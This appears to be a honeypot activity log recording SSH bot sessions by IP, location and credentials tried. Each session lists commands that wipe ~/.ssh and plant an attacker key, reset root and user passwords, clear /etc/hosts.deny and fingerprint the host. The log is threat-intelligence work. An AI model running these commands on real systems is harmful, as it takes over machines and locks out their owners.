$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Pw1IiUIXHuR5"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_2 (150.241.88.244) β€” Helsinki, Finland Β· 5 sessions Β· 97 cmds
2026-05-06 01:18 EDT Β· as ftpuser/P@ssw0rd, root/123asd,./, root/Admin@12#$
config (repeated config 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—5 // CPU profiling
$ echo "root:C3rwqKqzZMjh"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—5 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—5
$ ls -lh $(which ls) Γ—5
$ which ls Γ—5
$ crontab -l Γ—5 // persistence setup
$ w Γ—5 // logged-in users check
$ uname -m Γ—5
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—5 // CPU profiling
$ top Γ—5 // process monitoring
$ uname Γ—5 // OS identification
$ uname -a Γ—5 // OS/kernel identification
$ whoami Γ—5 // privilege check
$ lscpu | grep Model Γ—5
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—5
$ echo "root:ReWJa4qR5osp"|chpasswd|bash
$ echo -e "P@ssw0rd\nYDlW13lGGx3k\nYDlW13lGGx3k"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "P@ssw0rd\nYDlW13lGGx3k\nYDlW13lGGx3k\n"|passwd
$ echo "root:jJ5t4MaCsEjY"|chpasswd|bash
$ echo -e "1qaz@WSX\niRLHRO7IbW7a\niRLHRO7IbW7a"|passwd|bash
$ echo "1qaz@WSX\niRLHRO7IbW7a\niRLHRO7IbW7a\n"|passwd
🎭 capoeira_root_7 (186.248.197.77) β€” CaetanΓ³polis, Brazil Β· 2 sessions Β· 38 cmds
2026-06-01 22:49 EDT Β· as root/123asd,./, root/Admin@12#$
config (repeated config 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:d0LuqpyWPDSt"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:lAW7DIpmkBJD"|chpasswd|bash
🎭 cowboy_root_24 (150.136.58.42) β€” Ashburn, United States Β· 2 sessions Β· 38 cmds
2026-06-01 22:55 EDT Β· as root/123asd,./, root/Admin@12#$
config (repeated config 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:mXn5fwXMIfIM"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:dgaeVGaKxTGC"|chpasswd|bash
🎭 eagle_2 (70.120.203.193) β€” Round Rock, United States Β· 1 session Β· 20 cmds
2026-06-01 22:59 EDT Β· as palladium/123456
config (repeated config 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nhMM0hLpw8i7e\nhMM0hLpw8i7e"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nhMM0hLpw8i7e\nhMM0hLpw8i7e\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_root_14 (103.217.186.86) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-06-01 22:56 EDT Β· as root/Ruibo2025!@#
config (repeated config 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:0wVusJ86g3G5"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 gouda_sol_8 (176.65.139.249) β€” Eygelshoven, The Netherlands Β· 1 session Β· 1 cmd
2026-06-01 20:34 EDT Β· as sam/abc123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m
🎭 specter_root_5 (183.91.11.36) β€” Hanoi, Vietnam Β· 6 sessions Β· 101 cmds
2026-05-15 16:53 EDT Β· as dbus-helper/warnight, hacker/123456, hari/hari123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—6 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—6 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—5 // CPU profiling
$ echo -e "P@ssw0rd\nsNJpALuReDs0\nsNJpALuReDs0"|passwd|bash
$ Enter new UNIX password: Γ—4
$ echo "P@ssw0rd\nsNJpALuReDs0\nsNJpALuReDs0\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—5 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—5
$ ls -lh $(which ls) Γ—5
$ which ls Γ—5
$ crontab -l Γ—5 // persistence setup
$ w Γ—5 // logged-in users check
$ uname -m Γ—5
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—5 // CPU profiling
$ top Γ—5 // process monitoring
$ uname Γ—5 // OS identification
$ uname -a Γ—5 // OS/kernel identification
$ whoami Γ—5 // privilege check
$ lscpu | grep Model Γ—5
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—5
$ echo -e "123456\nRUAEh6Lrr0F3\nRUAEh6Lrr0F3"|passwd|bash
$ echo "123456\nRUAEh6Lrr0F3\nRUAEh6Lrr0F3\n"|passwd
$ echo -e "hari123\nePS5iDEB8KBb\nePS5iDEB8KBb"|passwd|bash
$ echo "hari123\nePS5iDEB8KBb\nePS5iDEB8KBb\n"|passwd
$ echo "root:VWD72oFWuIaU"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "linux123\n1Q6mzhRNGXiV\n1Q6mzhRNGXiV"|passwd|bash
$ echo "linux123\n1Q6mzhRNGXiV\n1Q6mzhRNGXiV\n"|passwd
🎭 specter_root_42 (61.219.156.91) β€” Banqiao, Taiwan Β· 3 sessions Β· 60 cmds
2026-06-01 19:44 EDT Β· as hacker/123456, hari/hari123, vyos/P@ssw0rd
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "123456\nF97Je8B9dihh\nF97Je8B9dihh"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "123456\nF97Je8B9dihh\nF97Je8B9dihh\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "hari123\nYrgFU9a36Mqg\nYrgFU9a36Mqg"|passwd|bash
$ echo "hari123\nYrgFU9a36Mqg\nYrgFU9a36Mqg\n"|passwd
$ echo -e "P@ssw0rd\nBezxF4TWYSNx\nBezxF4TWYSNx"|passwd|bash
$ echo "P@ssw0rd\nBezxF4TWYSNx\nBezxF4TWYSNx\n"|passwd
🎭 windmill_2 (45.116.104.33) β€” Naaldwijk, The Netherlands Β· 1 session Β· 20 cmds
2026-06-01 19:33 EDT Β· as hacker/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\n8MUAgv8cLPZv\n8MUAgv8cLPZv"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\n8MUAgv8cLPZv\n8MUAgv8cLPZv\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_2 (106.12.43.166) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-06-01 19:31 EDT Β· as hari/hari123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "hari123\nLIq0LL10g2nD\nLIq0LL10g2nD"|passwd|bash
$ Enter new UNIX password:
$ echo "hari123\nLIq0LL10g2nD\nLIq0LL10g2nD\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_2 (38.146.29.239) β€” Los Angeles, United States Β· 1 session Β· 20 cmds
2026-06-01 18:40 EDT Β· as fang/fang123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "fang123\n8uRC7oI0VMWI\n8uRC7oI0VMWI"|passwd|bash
$ Enter new UNIX password:
$ echo "fang123\n8uRC7oI0VMWI\n8uRC7oI0VMWI\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 tea_root (51.75.161.33) β€” Erith, United Kingdom Β· 1 session Β· 19 cmds
2026-06-01 18:05 EDT Β· as root/1qw23er4
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:ohhRdYLnXkbc"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 kimchi_3 (122.35.192.61) β€” Yongin-si, South Korea Β· 1 session Β· 20 cmds
2026-06-01 18:04 EDT Β· as tom/tomtom
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "tomtom\nTpIcBuXMwzRr\nTpIcBuXMwzRr"|passwd|bash
$ Enter new UNIX password:
$ echo "tomtom\nTpIcBuXMwzRr\nTpIcBuXMwzRr\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_35 (206.237.127.69) β€” Tai Wo Hau, Hong Kong Β· 1 session Β· 20 cmds
2026-06-01 16:00 EDT Β· as Intel(R)/Core(TM)
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
